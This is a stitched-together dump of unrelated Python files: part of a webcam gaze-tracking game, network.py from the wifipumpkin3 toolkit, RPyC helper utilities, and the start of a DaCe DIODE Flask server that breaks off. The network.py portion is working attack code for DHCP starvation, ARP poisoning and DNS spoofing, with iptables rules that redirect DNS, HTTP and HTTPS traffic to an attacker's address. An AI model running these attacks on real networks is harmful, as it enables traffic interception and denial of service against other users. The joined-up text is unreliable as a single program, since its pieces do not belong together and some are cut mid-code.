# init game screen
#args.headless = True
screenSize = pyautogui.size()
screen = np.zeros([screenSize.height,screenSize.width,3],dtype=np.uint8)
screen.fill(255)
cv.circle(screen, (int(screenSize.width/2),int(screenSize.height/2)), 10, (0,0,255), -1)
#cv.namedWindow("window", cv.WND_PROP_FULLSCREEN)
#cv.setWindowProperty("window",cv.WND_PROP_FULLSCREEN,cv.WINDOW_FULLSCREEN)
return screen
def game_save_data(data):
pass
def create_dot(screen, screenSize):
x = random.randint(1, screenSize.width)
y = random.randint(1, screenSize.height)
cv.circle(screen, (x,y), 10, (0,0,255), -1)
def game_update(save_data):
data = {}
if "face_orientation" in frame:
data["face_orientation"] = frame["face_orientation"]
data["eye_L"] = frame["eyes"][0]
data["eye_R"] = frame["eyes"][1]
print(data)
print("#######################################")
cv.putText(screen, 'face', (10,30), cv.FONT_HERSHEY_SIMPLEX, 1, (0,255,0),2, cv.LINE_AA)
if save_data:
game_save_data(data)
screen.fill(255)
create_dot(screen, pyautogui.size())
else:
cv.putText(screen, 'face', (10,30), cv.FONT_HERSHEY_SIMPLEX, 1, (0,0,255),2, cv.LINE_AA)
if frame["eyes"][0]["side"] !="left":
print("ERROR, first eye was not left")
import sys
sys.exit()
def parseArgs():
# Set global log level
parser = argparse.ArgumentParser(description='Demonstration of landmarks localization.')
parser.add_argument('-v', type=str, help='logging level', default='info',
choices=['debug', 'info', 'warning', 'error', 'critical'])
parser.add_argument('--from_video', type=str, help='Use this video path instead of webcam')
parser.add_argument('--record_video', type=str, help='Output path of video of demonstration.')
parser.add_argument('--fullscreen', action='store_true')
parser.add_argument('--headless', action='store_true')
parser.add_argument('--fps', type=int, default=60, help='Desired sampling rate of webcam')
parser.add_argument('--camera_id', type=int, default=0, help='ID of webcam to use')
args = parser.parse_args()
return args
def gazeInit(args):
# Declare some parameters
batch_size = 2
# Define webcam stream data source
# Change data_format='NHWC' if not using CUDA
if args.from_video:
assert os.path.isfile(args.from_video)
data_source = Video(args.from_video,
tensorflow_session=session, batch_size=batch_size,
data_format='NCHW' if gpu_available else 'NHWC',
eye_image_shape=(108, 180))
else:
data_source = Webcam(tensorflow_session=session, batch_size=batch_size,
camera_id=args.camera_id, fps=args.fps,
data_format='NCHW' if gpu_available else 'NHWC',
eye_image_shape=(36, 60))
# Define model
if args.from_video:
model = ELG(
session, train_data={'videostream': data_source},
first_layer_stride=3,
num_modules=3,
num_feature_maps=64,
learning_schedule=[
{
'loss_terms_to_optimize': {'dummy': ['hourglass', 'radius']},
},
],
)
else:
model = ELG(
session, train_data={'videostream': data_source},
first_layer_stride=1,
num_modules=2,
num_feature_maps=32,
learning_schedule=[
{
'loss_terms_to_optimize': {'dummy': ['hourglass', 'radius']},
},
],
)
return data_source, model, batch_size
def _visualize_output():
last_frame_index = 0
last_frame_time = time.time()
fps_history = []
all_gaze_histories = []
gameon = False
space_pressed = False
if args.fullscreen:
cv.namedWindow('vis', cv.WND_PROP_FULLSCREEN)
cv.setWindowProperty('vis', cv.WND_PROP_FULLSCREEN, cv.WINDOW_FULLSCREEN)
while True:
if gameon:
if cv.waitKey(1) & 0xFF == 32:
space_pressed = True
# If no output to visualize, show unannotated frame
if inferred_stuff_queue.empty():
next_frame_index = last_frame_index + 1
if next_frame_index in data_source._frames:
next_frame = data_source._frames[next_frame_index]
if 'faces' in next_frame and len(next_frame['faces']) == 0:
if not args.headless:
cv.imshow('vis', next_frame['bgr'])
last_frame_index = next_frame_index
if cv.waitKey(1) & 0xFF == ord('q'):
return
continue
# Get output from neural network and visualize
output = inferred_stuff_queue.get()
bgr = None
for j in range(batch_size):
if gameon:
if cv.waitKey(1) & 0xFF == 32:
space_pressed = True
frame_index = output['frame_index'][j]
if frame_index not in data_source._frames:
continue
frame = data_source._frames[frame_index]
# Decide which landmarks are usable
heatmaps_amax = np.amax(output['heatmaps'][j, :].reshape(-1, 18), axis=0)
can_use_eye = np.all(heatmaps_amax > 0.7)
can_use_eyelid = np.all(heatmaps_amax[0:8] > 0.75)
can_use_iris = np.all(heatmaps_amax[8:16] > 0.8)
start_time = time.time()
eye_index = output['eye_index'][j]
bgr = frame['bgr']
eye = frame['eyes'][eye_index]
eye_image = eye['image']
eye_side = eye['side']
eye_landmarks = output['landmarks'][j, :]
eye_radius = output['radius'][j][0]
if eye_side == 'left':
eye_landmarks[:, 0] = eye_image.shape[1] - eye_landmarks[:, 0]
eye_image = np.fliplr(eye_image)
# Embed eye image and annotate for picture-in-picture
eye_upscale = 2
eye_image_raw = cv.cvtColor(cv.equalizeHist(eye_image), cv.COLOR_GRAY2BGR)
eye_image_raw = cv.resize(eye_image_raw, (0, 0), fx=eye_upscale, fy=eye_upscale)
eye_image_annotated = np.copy(eye_image_raw)
if can_use_eyelid:
cv.polylines(
eye_image_annotated,
[np.round(eye_upscale*eye_landmarks[0:8]).astype(np.int32)
.reshape(-1, 1, 2)],
isClosed=True, color=(255, 255, 0), thickness=1, lineType=cv.LINE_AA,
)
if can_use_iris:
cv.polylines(
eye_image_annotated,
[np.round(eye_upscale*eye_landmarks[8:16]).astype(np.int32)
.reshape(-1, 1, 2)],
isClosed=True, color=(0, 255, 255), thickness=1, lineType=cv.LINE_AA,
)
cv.drawMarker(
eye_image_annotated,
tuple(np.round(eye_upscale*eye_landmarks[16, :]).astype(np.int32)),
color=(0, 255, 255), markerType=cv.MARKER_CROSS, markerSize=4,
thickness=1, line_type=cv.LINE_AA,
)
face_index = int(eye_index / 2)
eh, ew, _ = eye_image_raw.shape
v0 = face_index * 2 * eh
v1 = v0 + eh
v2 = v1 + eh
u0 = 0 if eye_side == 'left' else ew
u1 = u0 + ew
bgr[v0:v1, u0:u1] = eye_image_raw
bgr[v1:v2, u0:u1] = eye_image_annotated
# Visualize preprocessing results
frame_landmarks = (frame['smoothed_landmarks']
if 'smoothed_landmarks' in frame
else frame['landmarks'])
for f, face in enumerate(frame['faces']):
for landmark in frame_landmarks[f][:-1]:
if gameon:
if cv.waitKey(1) & 0xFF == 32:
space_pressed = True
cv.drawMarker(bgr, tuple(np.round(landmark).astype(np.int32)),
color=(0, 0, 255), markerType=cv.MARKER_STAR,
markerSize=2, thickness=1, line_type=cv.LINE_AA)
cv.rectangle(
bgr, tuple(np.round(face[:2]).astype(np.int32)),
tuple(np.round(np.add(face[:2], face[2:])).astype(np.int32)),
color=(0, 255, 255), thickness=1, lineType=cv.LINE_AA,
)
# Transform predictions
eye_landmarks = np.concatenate([eye_landmarks,
[[eye_landmarks[-1, 0] + eye_radius,
eye_landmarks[-1, 1]]]])
eye_landmarks = np.asmatrix(np.pad(eye_landmarks, ((0, 0), (0, 1)),
'constant', constant_values=1.0))
eye_landmarks = (eye_landmarks *
eye['inv_landmarks_transform_mat'].T)[:, :2]
eye_landmarks = np.asarray(eye_landmarks)
eyelid_landmarks = eye_landmarks[0:8, :]
iris_landmarks = eye_landmarks[8:16, :]
iris_centre = eye_landmarks[16, :]
eyeball_centre = eye_landmarks[17, :]
eyeball_radius = np.linalg.norm(eye_landmarks[18, :] -
eye_landmarks[17, :])
# Smooth and visualize gaze direction
num_total_eyes_in_frame = len(frame['eyes'])
if len(all_gaze_histories) != num_total_eyes_in_frame:
all_gaze_histories = [list() for _ in range(num_total_eyes_in_frame)]
gaze_history = all_gaze_histories[eye_index]
if can_use_eye:
# Visualize landmarks
cv.drawMarker( # Eyeball centre
bgr, tuple(np.round(eyeball_centre).astype(np.int32)),
color=(0, 255, 0), markerType=cv.MARKER_CROSS, markerSize=4,
thickness=1, line_type=cv.LINE_AA,
)
# cv.circle( # Eyeball outline
# bgr, tuple(np.round(eyeball_centre).astype(np.int32)),
# int(np.round(eyeball_radius)), color=(0, 255, 0),
# thickness=1, lineType=cv.LINE_AA,
# )
# Draw "gaze"
# from models.elg import estimate_gaze_from_landmarks
# current_gaze = estimate_gaze_from_landmarks(
# iris_landmarks, iris_centre, eyeball_centre, eyeball_radius)
i_x0, i_y0 = iris_centre
e_x0, e_y0 = eyeball_centre
theta = -np.arcsin(np.clip((i_y0 - e_y0) / eyeball_radius, -1.0, 1.0))
phi = np.arcsin(np.clip((i_x0 - e_x0) / (eyeball_radius * -np.cos(theta)),
-1.0, 1.0))
current_gaze = np.array([theta, phi])
gaze_history.append(current_gaze)
gaze_history_max_len = 10
if len(gaze_history) > gaze_history_max_len:
gaze_history = gaze_history[-gaze_history_max_len:]
util.gaze.draw_gaze(bgr, iris_centre, np.mean(gaze_history, axis=0),
length=120.0, thickness=1)
else:
gaze_history.clear()
if can_use_eyelid:
cv.polylines(
bgr, [np.round(eyelid_landmarks).astype(np.int32).reshape(-1, 1, 2)],
isClosed=True, color=(255, 255, 0), thickness=1, lineType=cv.LINE_AA,
)
if can_use_iris:
cv.polylines(
bgr, [np.round(iris_landmarks).astype(np.int32).reshape(-1, 1, 2)],
isClosed=True, color=(0, 255, 255), thickness=1, lineType=cv.LINE_AA,
)
cv.drawMarker(
bgr, tuple(np.round(iris_centre).astype(np.int32)),
color=(0, 255, 255), markerType=cv.MARKER_CROSS, markerSize=4,
thickness=1, line_type=cv.LINE_AA,
)
### face orientation ########################################
face_landmarks = frame['face_landmarks']
face_orientation = get_face_orient(bgr, face_landmarks)
frame['face_orientation'] = face_orientation
#############################################################
dtime = 1e3*(time.time() - start_time)
if 'visualization' not in frame['time']:
frame['time']['visualization'] = dtime
else:
frame['time']['visualization'] += dtime
def _dtime(before_id, after_id):
return int(1e3 * (frame['time'][after_id] - frame['time'][before_id]))
def _dstr(title, before_id, after_id):
return '%s: %dms' % (title, _dtime(before_id, after_id))
if eye_index == len(frame['eyes']) - 1:
# Calculate timings
frame['time']['after_visualization'] = time.time()
fps = int(np.round(1.0 / (time.time() - last_frame_time)))
fps_history.append(fps)
if len(fps_history) > 60:
fps_history = fps_history[-60:]
fps_str = '%d FPS' % np.mean(fps_history)
last_frame_time = time.time()
fh, fw, _ = bgr.shape
cv.putText(bgr, fps_str, org=(fw - 110, fh - 20),
fontFace=cv.FONT_HERSHEY_DUPLEX, fontScale=0.8,
color=(0, 0, 0), thickness=1, lineType=cv.LINE_AA)
cv.putText(bgr, fps_str, org=(fw - 111, fh - 21),
fontFace=cv.FONT_HERSHEY_DUPLEX, fontScale=0.79,
color=(255, 255, 255), thickness=1, lineType=cv.LINE_AA)
if gameon:
if cv.waitKey(1) & 0xFF == 32:
space_pressed = True
if space_pressed:
game_update(True)
space_pressed = False
cv.imshow('game', screen)
else:
cv.imshow('vis', bgr)
last_frame_index = frame_index
if cv.waitKey(1) & 0xFF == ord('q'):
return
# Print timings
if frame_index % 60 == 0:
latency = _dtime('before_frame_read', 'after_visualization')
processing = _dtime('after_frame_read', 'after_visualization')
timing_string = ', '.join([
_dstr('read', 'before_frame_read', 'after_frame_read'),
_dstr('preproc', 'after_frame_read', 'after_preprocessing'),
'infer: %dms' % int(frame['time']['inference']),
'vis: %dms' % int(frame['time']['visualization']),
'proc: %dms' % processing,
'latency: %dms' % latency,
])
print('%08d [%s] %s' % (frame_index, fps_str, timing_string))
game_update(False)
if gameon:
game_update(False)
cv.imshow('game', screen)
if cv.waitKey(1) & 0xFF == 32:
space_pressed = True
else:
if cv.waitKey(1) & 0xFF == 32:# ord('s'):
gameon = True
game_init()
if __name__ == '__main__':
args = parseArgs()
coloredlogs.install(
datefmt='%d/%m %H:%M',
fmt='%(asctime)s %(levelname)s %(message)s',
level=args.v.upper(),
)
# Check if GPU is available
from tensorflow.python.client import device_lib
session_config = tf.ConfigProto(gpu_options=tf.GPUOptions(allow_growth=True))
gpu_available = False
try:
gpus = [d for d in device_lib.list_local_devices(config=session_config)
if d.device_type == 'GPU']
gpu_available = len(gpus) > 0
except:
pass
# Initialize Tensorflow session
tf.logging.set_verbosity(tf.logging.INFO)
with tf.Session(config=session_config) as session:
data_source, model, batch_size = gazeInit(args)
# Begin visualization thread
inferred_stuff_queue = queue.Queue()
visualize_thread = threading.Thread(target=_visualize_output, name='visualization')
visualize_thread.daemon = True
visualize_thread.start()
# Do inference forever
infer = model.inference_generator()
screen = game_init()
game_thread = threading.Thread(target=game_update, name="game")
while True:
# keyboard = cv.waitKey(1)
keyboard = -1
output = next(infer)
for frame_index in np.unique(output['frame_index']):
if frame_index not in data_source._frames:
continue
frame = data_source._frames[frame_index]
if 'inference' in frame['time']:
frame['time']['inference'] += output['inference_time']
else:
frame['time']['inference'] = output['inference_time']
#print("nothing to do")
inferred_stuff_queue.put_nowait(output)
if not visualize_thread.isAlive():
print("visualisation closed, quitting")
break
if not data_source._open:
print("camera closed, quitting")
break
cv.destroyAllWindows()
|
network.py
|
import Queue
from os import system
from scapy.all import *
from threading import Thread
from PyQt5.QtCore import (
QThread,
QObject,
QProcess,
pyqtSlot,
pyqtSignal,
pyqtSlot,
)
from datetime import datetime
# This file is part of the wifipumpkin3 Open Source Project.
# wifipumpkin3 is licensed under the Apache 2.0.
# Copyright 2020 P0cL4bs Team - Marcos Bomfim (mh4x0f)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class ThreadAttackStar(QThread):
def __init__(self, interface):
QThread.__init__(self)
self.interface = interface
self.process = True
def run(self):
print("Starting Thread:" + self.objectName())
self.count = 0
while self.process:
conf.checkIPaddr = False
dhcp_discover = (
Ether(src=RandMAC(), dst="ff:ff:ff:ff:ff:ff")
/ IP(src="0.0.0.0", dst="255.255.255.255")
/ UDP(sport=68, dport=67)
/ BOOTP(chaddr=RandString(12, "0123456789abcdef"))
/ DHCP(options=[("message-type", "discover"), "end"])
)
sendp(dhcp_discover)
self.count += 1
self.data = "PacketSend:[%s] DISCOVER Interface: %s " % (
self.count,
self.interface,
) + datetime.now().strftime("%c")
self.emit(pyqtSignal("Activated( QString )"), self.data.rstrip())
self.emit(
pyqtSignal("Activated( QString )"),
"[ OFF ] Packet sent: " + str(self.count),
)
def stop(self):
print("Stop thread:" + self.objectName())
self.process = False
class ThARP_posion(QThread):
def __init__(self, srcAddress, dstAddress, mac):
QThread.__init__(self)
self.srcAddress = srcAddress
self.dstAddress = dstAddress
self.mac = mac
self.process = True
def makePacket(self):
ether = Ether(dst="ff:ff:ff:ff:ff:ff", src=self.mac)
parp = ARP(
hwtype=0x1,
ptype=0x800,
hwlen=0x6,
plen=0x4,
op="is-at",
hwsrc=self.mac,
psrc=self.srcAddress,
hwdst="ff:ff:ff:ff:ff:ff",
pdst=self.dstAddress,
)
padding = Padding(load="\x00" * 18)
packet_arp = ether / parp / padding
return packet_arp
def run(self):
print("Starting Thread:" + self.objectName())
pkt = self.makePacket()
while self.process:
send(pkt, verbose=False, count=3), sendp(pkt, verbose=False, count=3)
def stop(self):
self.process = False
print("Stop thread:" + self.objectName())
self.emit(pyqtSignal("Activated( QString )"), "Ok")
class ThreadDNSspoofNF(QObject):
DnsReq = pyqtSignal(object)
def __init__(self, domains, interface, redirect, APmode=True, parent=None):
super(ThreadDNSspoofNF, self).__init__(parent)
self.domains = domains
self.interface = interface
self.redirect = redirect
self.APmode = APmode
self.desc = "DNS spoof Module::NetFilter"
@pyqtSlot()
def readProcessOutput(self):
self.data = str(self.procThreadDNS.readAllStandardOutput())
self.DnsReq.emit(self.data)
def start(self):
self.setIptables(self.APmode, option="A")
self.procThreadDNS = QProcess(self)
self.procThreadDNS.setProcessChannelMode(QProcess.MergedChannels)
QObject.connect(
self.procThreadDNS,
pyqtSignal("readyReadStandardOutput()"),
self,
pyqtSlot("readProcessOutput()"),
)
self.procThreadDNS.start(
"python",
[
"core/packets/dnsspoofNF.py",
"-r",
self.redirect,
"-d",
",".join(self.domains),
],
)
def setIptables(self, APMode=True, option=str()):
if APMode:
system(
"iptables -{} INPUT -i {} -p udp --dport 53 -s {} -j ACCEPT".format(
option, self.interface, self.redirect
)
)
system(
"iptables -{} INPUT -i {} -p udp --dport 53 -j DROP".format(
option, self.interface
)
)
system(
"iptables -t nat -{} PREROUTING -p udp --dport 53 -j NFQUEUE".format(
option
)
)
def stop(self):
self.setIptables(self.APmode, option="D")
if hasattr(self, "procThreadDNS"):
self.procThreadDNS.terminate()
self.procThreadDNS.waitForFinished()
self.procThreadDNS.kill()
class ThSpoofAttack(QThread):
def __init__(self, domains, interface, filter, verbose, redirect):
QThread.__init__(self)
self.target = domains
self.filter = filter
self.verbose = verbose
self.interface = interface
self.redirect = redirect
self.finished = False
self.mac = get_if_hwaddr(self.interface)
self.desc = ["Module DNS spoof"]
def run(self):
print("Starting Thread:" + self.objectName())
self.sniff()
def ARP(self, target, gateway):
ether = Ether(dst="ff:ff:ff:ff:ff:ff", src=self.mac)
parp = ARP(
hwtype=0x1,
ptype=0x800,
hwlen=0x6,
plen=0x4,
op="is-at",
hwsrc=self.mac,
psrc=gateway,
hwdst="ff:ff:ff:ff:ff:ff",
pdst=target,
)
padding = Padding(load="\x00" * 18)
packet_arp = ether / parp / padding
while True:
try:
sendp(packet_arp, verbose=False, count=3)
send(packet_arp, verbose=False, count=3)
except:
pass
def StartSpoof(self, q):
while self.finished:
sniff(
iface=self.interface,
count=10,
filter=self.filter,
prn=lambda x: q.put(x),
)
def sniff(self):
self.setIptables(option="A")
q = Queue.Queue()
sniffer = Thread(target=self.StartSpoof, args=(q,))
sniffer.daemon = True
sniffer.start()
while not self.finished:
try:
pkt = q.get(timeout=1)
self.Poisoning(pkt)
except Queue.Empty:
pass
def Poisoning(self, packet):
# https://github.com/Adastra-thw/pyHacks/blob/master/MitmDnsSpoofingPoC.py
if (
packet.haslayer(DNS)
and packet.getlayer(DNS).qr == 0
and len(self.target.keys()) > 0
):
if (
packet[DNS].qd.qname[: len(str(packet[DNS].qd.qname)) - 1]
in self.target.keys()
):
requestIP = packet[IP]
requestUDP = packet[UDP]
requestDNS = packet[DNS]
requestDNSQR = packet[DNSQR]
responseIP = IP(src=requestIP.dst, dst=requestIP.src)
responseUDP = UDP(sport=requestUDP.dport, dport=requestUDP.sport)
responseDNSRR = DNSRR(
rrname=packet.getlayer(DNS).qd.qname, rdata=self.redirect
)
responseDNS = DNS(
qr=1, id=requestDNS.id, qd=requestDNSQR, an=responseDNSRR
)
answer = responseIP / responseUDP / responseDNS
send(answer)
elif (
packet.haslayer(DNS)
and packet.getlayer(DNS).qr == 0
and len(self.target.keys()) == 0
):
try:
requestIP = packet[IP]
requestUDP = packet[UDP]
requestDNS = packet[DNS]
requestDNSQR = packet[DNSQR]
responseIP = IP(src=requestIP.dst, dst=requestIP.src)
responseUDP = UDP(sport=requestUDP.dport, dport=requestUDP.sport)
responseDNSRR = DNSRR(
rrname=packet.getlayer(DNS).qd.qname, rdata=self.redirect
)
responseDNS = DNS(
qr=1, id=requestDNS.id, qd=requestDNSQR, an=responseDNSRR
)
answer = responseIP / responseUDP / responseDNS
send(answer)
except Exception:
pass
def setIptables(self, option=str()):
system(
"iptables -t nat -{} PREROUTING -p udp --dport 53 -j NFQUEUE".format(option)
)
system(
"iptables -{} FORWARD --in-interface {} --jump ACCEPT".format(
option, self.interface
)
)
system(
"iptables -t nat -{} POSTROUTING --out-interface {} --jump MASQUERADE".format(
option, self.interface
)
)
system(
"iptables -t nat -{} PREROUTING -p tcp --dport 80 --jump DNAT --to-destination {}".format(
option, self.redirect
)
)
system(
"iptables -t nat -{} PREROUTING -p tcp --dport 443 --jump DNAT --to-destination {}".format(
option, self.redirect
)
)
system(
"iptables -t nat -{} PREROUTING -i {} -p udp --dport 53 -j DNAT --to {}".format(
option, self.interface, self.redirect
)
)
system(
"iptables -t nat -{} PREROUTING -i {} -p tcp --dport 53 -j DNAT --to {}".format(
option, self.interface, self.redirect
)
)
def stop(self):
print("Stop Thread:" + self.objectName())
self.finished = True
self.setIptables(option="D")
self.emit(pyqtSignal("Activated( QString )"), "finished")
|
helpers.py
|
"""
Helpers and wrappers for common RPyC tasks
"""
import time
import threading
from rpyc.lib.colls import WeakValueDict
from rpyc.lib.compat import callable
from rpyc.core.consts import HANDLE_BUFFITER, HANDLE_CALL
from rpyc.core.netref import syncreq, asyncreq
def buffiter(obj, chunk = 10, max_chunk = 1000, factor = 2):
"""Buffered iterator - reads the remote iterator in chunks starting with
*chunk*, multiplying the chunk size by *factor* every time, as an
exponential-backoff, up to a chunk of *max_chunk* size.
``buffiter`` is very useful for tight loops, where you fetch an element
from the other side with every iterator. Instead of being limited by the
network's latency after every iteration, ``buffiter`` fetches a "chunk"
of elements every time, reducing the amount of network I/Os.
:param obj: An iterable object (supports ``iter()``)
:param chunk: the initial chunk size
:param max_chunk: the maximal chunk size
:param factor: the factor by which to multiply the chunk size after every
iterator (up to *max_chunk*). Must be >= 1.
:returns: an iterator
Example::
cursor = db.get_cursor()
for id, name, dob in buffiter(cursor.select("Id", "Name", "DoB")):
print id, name, dob
"""
if factor < 1:
raise ValueError("factor must be >= 1, got %r" % (factor,))
it = iter(obj)
count = chunk
while True:
items = syncreq(it, HANDLE_BUFFITER, count)
count = min(count * factor, max_chunk)
if not items:
break
for elem in items:
yield elem
def restricted(obj, attrs, wattrs = None):
"""Returns a 'restricted' version of an object, i.e., allowing access only to a subset of its
attributes. This is useful when returning a "broad" or "dangerous" object, where you don't
want the other party to have access to all of its attributes.
.. versionadded:: 3.2
:param obj: any object
:param attrs: the set of attributes exposed for reading (``getattr``) or writing (``setattr``).
The same set will serve both for reading and writing, unless wattrs is explicitly
given.
:param wattrs: the set of attributes exposed for writing (``setattr``). If ``None``,
``wattrs`` will default to ``attrs``. To disable setting attributes completely,
set to an empty tuple ``()``.
:returns: a restricted view of the object
Example::
class MyService(rpyc.Service):
def exposed_open(self, filename):
f = open(filename, "r")
return rpyc.restricted(f, {"read", "close"}) # disallow access to `seek` or `write`
"""
if wattrs is None:
wattrs = attrs
class Restricted(object):
def _rpyc_getattr(self, name):
if name not in attrs:
raise AttributeError(name)
return getattr(obj, name)
__getattr__ = _rpyc_getattr
def _rpyc_setattr(self, name, value):
if name not in wattrs:
raise AttributeError(name)
setattr(obj, name, value)
__setattr__ = _rpyc_setattr
return Restricted()
class _Async(object):
"""Creates an async proxy wrapper over an existing proxy. Async proxies
are cached. Invoking an async proxy will return an AsyncResult instead of
blocking"""
__slots__ = ("proxy", "__weakref__")
def __init__(self, proxy):
self.proxy = proxy
def __call__(self, *args, **kwargs):
return asyncreq(self.proxy, HANDLE_CALL, args, tuple(kwargs.items()))
def __repr__(self):
return "async(%r)" % (self.proxy,)
_async_proxies_cache = WeakValueDict()
def async(proxy):
"""
Returns an asynchronous "version" of the given proxy. Invoking the returned
proxy will not block; instead it will return an
:class:`rpyc.core.async.AsyncResult` object that you can test for completion
:param proxy: any **callable** RPyC proxy
:returns: the proxy, wrapped by an asynchronous wrapper
Example::
async_sleep = rpyc.async(conn.modules.time.sleep)
res = async_sleep(5)
.. _async_note:
.. note::
In order to avoid overloading the GC, the returned asynchronous wrapper is
cached as a weak reference. Therefore, do not use::
rpyc.async(foo)(5)
Always store the returned asynchronous wrapper in a variable, e.g. ::
a_foo = rpyc.async(foo)
a_foo(5)
"""
pid = id(proxy)
if pid in _async_proxies_cache:
return _async_proxies_cache[pid]
if not hasattr(proxy, "____conn__") or not hasattr(proxy, "____oid__"):
raise TypeError("'proxy' must be a Netref: %r", (proxy,))
if not callable(proxy):
raise TypeError("'proxy' must be callable: %r" % (proxy,))
caller = _Async(proxy)
_async_proxies_cache[id(caller)] = _async_proxies_cache[pid] = caller
return caller
async.__doc__ = _Async.__doc__
class timed(object):
"""Creates a timed asynchronous proxy. Invoking the timed proxy will
run in the background and will raise an :class:`rpyc.core.async.AsyncResultTimeout`
exception if the computation does not terminate within the given time frame
:param proxy: any **callable** RPyC proxy
:param timeout: the maximal number of seconds to allow the operation to run
:returns: a ``timed`` wrapped proxy
Example::
t_sleep = rpyc.timed(conn.modules.time.sleep, 6) # allow up to 6 seconds
t_sleep(4) # okay
t_sleep(8) # will time out and raise AsyncResultTimeout
"""
__slots__ = ("__weakref__", "proxy", "timeout")
def __init__(self, proxy, timeout):
self.proxy = async(proxy)
self.timeout = timeout
def __call__(self, *args, **kwargs):
res = self.proxy(*args, **kwargs)
res.set_expiry(self.timeout)
return res
def __repr__(self):
return "timed(%r, %r)" % (self.proxy.proxy, self.timeout)
class BgServingThread(object):
"""Runs an RPyC server in the background to serve all requests and replies
that arrive on the given RPyC connection. The thread is started upon the
the instantiation of the ``BgServingThread`` object; you can use the
:meth:`stop` method to stop the server thread
Example::
conn = rpyc.connect(...)
bg_server = BgServingThread(conn)
...
bg_server.stop()
.. note::
For a more detailed explanation of asynchronous operation and the role of the
``BgServingThread``, see :ref:`tut5`
"""
# these numbers are magical...
SERVE_INTERVAL = 0.0
SLEEP_INTERVAL = 0.1
def __init__(self, conn):
self._conn = conn
self._thread = threading.Thread(target = self._bg_server)
self._thread.setDaemon(True)
self._active = True
self._thread.start()
def __del__(self):
if self._active:
self.stop()
def _bg_server(self):
try:
while self._active:
self._conn.serve(self.SERVE_INTERVAL)
time.sleep(self.SLEEP_INTERVAL) # to reduce contention
except Exception:
if self._active:
self._active = False
raise
def stop(self):
"""stop the server thread. once stopped, it cannot be resumed. you will
have to create a new BgServingThread object later."""
assert self._active
self._active = False
self._thread.join()
self._conn = None
|
diode_rest.py
|
#!flask/bin/python
import dace
import dace.serialize
import dace.frontend.octave.parse as octave_frontend
import dace.frontend.python.parser as python_frontend
from diode.optgraph.DaceState import DaceState
from dace.transformation.optimizer import SDFGOptimizer
import inspect
from flask import Flask, Response, request, redirect, url_for, abort, make_response, jsonify, send_from_directory, send_file
import json, copy
import re
from diode.remote_execution import Executor, AsyncExecutor
import traceback, os, threading, queue, time
# Enum imports
from dace.dtypes import AccessType
from dace import ScheduleType, Language, StorageType
app = Flask(__name__)
# Prepare a whitelist of DaCe enumeration types
enum_list = [
typename
for typename, dtype in inspect.getmembers(dace.dtypes, inspect.isclass)
if issubclass(dtype, dace.dtypes.AutoNumber)
]
es_ref = []
config_lock = threading.Lock()
RUNNING_TIMEOUT = 3
class ConfigCopy:
"""
Copied Config for passing by-value
"""
def __init__(self, config_values):
self._config = config_values
def get(self, *key_hierarchy):
current_conf = self._config
for key in key_hierarchy:
current_conf = current_conf[key]
return current_conf
def get_bool(self, *key_hierarchy):
from dace.config import _env2bool
res = self.get(*key_hierarchy)
if isinstance(res, bool):
return res
return _env2bool(str(res))
def set(self, *key_hierarchy, value=None, autosave=False):
raise Exception("ConfigCopy does not allow setting values!")
def save(self, path=None):
""" Nonstatic version of Config::save()
"""
if path is None:
path = Config._cfg_filename
# Write configuration file
with open(path, 'w') as f:
import yaml
yaml.dump(self._config, f, default_flow_style=False)
class ExecutorServer:
"""
Implements a server scheduling execution of dace programs
"""
def __init__(self):
self._command_queue = queue.Queue(
) # Fast command queue. Must be polled often (< 30 ms response time)
self._executor_queue = queue.Queue(
) # Run command queue. Latency not critical
_self = self
def helper():
_self.loop()
def ehelper():
_self.executorLoop()
self._task_dict = {}
self._run_num = 0
self._running = True
self._thread = threading.Thread(target=helper, daemon=True)
self._thread.start()
self._executor_thread = threading.Thread(target=ehelper, daemon=True)
self._executor_thread.start()
self._current_runs = {}
self._orphaned_runs = {}
self._oplock = threading.Lock()
self._run_cv = threading.Condition(
) # Used to trickle run tasks through (as the tasks are run in a thread)
self._slot_available = True # True if the target machine has a slot for running a program
self._perfdata_available = {} # Dict mapping client_id => .can-path
# (NOTE: We do not handle the raw data in DIODE, i.e. no perfdata.db)
# (this may change later)
self._ticket_counter = 0
self._command_results = {} # Dict mapping ticket => command result
def executorLoop(self):
while self._running:
self.consume_programs()
def loop(self):
while self._running:
self.consume()
def waitForCommand(self, ticket):
while True:
try:
with self._oplock:
ret = self._command_results[ticket]
del self._command_results[ticket]
except:
time.sleep(2)
continue
return ret
def addCommand(self, cmd):
import random
with self._oplock:
cmd['ticket'] = self._ticket_counter
self._ticket_counter += 1
self._command_queue.put(cmd)
print("Added command to queue")
return cmd['ticket']
def consume_programs(self):
try:
cmd = self._executor_queue.get(timeout=3)
#print("cmd: " + str(cmd))
if cmd['cmd'] == "run":
while True:
with self._run_cv:
if self._slot_available:
break
import time
time.sleep(0.5)
with self._run_cv:
self._slot_available = False
print("Running task")
self._task_dict[cmd['index']]['state'] = 'running'
runner = self.run(
cmd['cot'], {
'index': cmd['index'],
'config_path': cmd['config_path'],
'client_id': cmd['cid'],
'reset-perfdata': cmd['reset-perfdata'],
'perfopts': cmd['opt']['perfopts']
})
print("Wait for oplock")
with self._oplock:
self._current_runs[cmd['cid']] = runner
import time
# Wait a predefined time for clients to catch up on the outputs
time.sleep(RUNNING_TIMEOUT)
with self._oplock:
run_locally = True
try:
x = self._current_runs[cmd['cid']]
except:
run_locally = False
if run_locally:
print("running locally")
def tmp():
with self._oplock:
del self._current_runs[cmd['cid']]
try:
c = self._orphaned_runs[cmd['cid']]
except:
self._orphaned_runs[cmd['cid']] = []
self._orphaned_runs[cmd['cid']].append([])
print("Starting runner")
for x in runner():
self._orphaned_runs[cmd['cid']][-1] += x
# Because this holds locks (and the output should be generated even if nobody asks for it immediately), this is run when the timeout for direct interception expires
tmp()
elif cmd['cmd'] == 'control':
# Control operations that must be synchronous with execution (e.g. for cleanup, storage operations)
with self._oplock:
self._task_dict[cmd['index']]['state'] = 'running'
if cmd['operation'] == 'startgroup':
from diode.db_scripts.db_setup import db_setup
perf_tmp_dir = ExecutorServer.getPerfdataDir(cmd['cid'])
perfdata_path = os.path.join(perf_tmp_dir, "perfdata.db")
# Clean database and create tables
